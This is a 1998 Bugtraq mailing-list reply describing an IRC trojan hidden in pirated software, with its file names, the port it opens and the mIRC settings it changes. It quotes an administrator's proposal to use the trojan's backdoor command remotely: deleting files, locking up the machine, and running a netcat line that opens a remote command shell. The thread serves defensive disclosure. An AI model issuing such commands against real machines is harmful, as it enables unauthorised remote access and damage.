[8117] in bugtraq
Re: Internet Wide DOS Attack using IRC
daemon@ATHENA.MIT.EDU (Samuel Cossette)
Sat Oct 3 15:10:02 1998
Date: Sat, 3 Oct 1998 14:41:54 -0400
Reply-To: Samuel Cossette <cluster@VIDEOTRON.CA>
From: Samuel Cossette <cluster@VIDEOTRON.CA>
X-To: George Imburgia <gti@HOPI.DTCC.EDU>
To: BUGTRAQ@NETSPACE.ORG
It's not the DO command of mIRC, it's a built-in command; it's the equivalent
of /QUOTE or /RAW in an IRC client, which sends the data directly to the
server.
At this time I have found 2 infected files directly:
Packet Handler Firewall and FlashFXP v1.0, both distributed on an XDCC bot on
#warez950-dcc. In a zip file with some fake .nfo and a SETUP.EXE (oce.exe)
of 354k. quicktools.ocx (EZFTP OLE Control Module) and Mswinsck.ocx are also
included.
Another interesting thing: the server opens port 15150; this is the prompt:
Enter your username:, probably an FTPD.
The trojan can also modify your mirc.ini; it adds auto-op, and modifies
your current script.
>
>With the DO command enabled, they gave us the means to remotely disable
>this trojan.
>
>Something to the effect of:
>
>msg <nick> .do del c:\windows\system\oce*.*
>
>Then, msg <nick> .do <some evil command to lock up the machine, forcing a
>reboot>.
>
...
>
>The mIRC DO command is very powerful, and can be used to install netcat on
>the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
>-p <any port> <your ip> -t -e command.com, giving a remote command prompt
>to investigate/disinfect the machine.
>
>
>______________________________________________________________________________
>George Imburgia e-mail: gti@hopi.dtcc.edu
>Systems Administrator Phone: (302)739-4068
>Delaware Technical & Community College Fax: (302)739-3345
>Office of the President Pager: (302)741-5962
Samuel Cossette
cluster@videotron.ca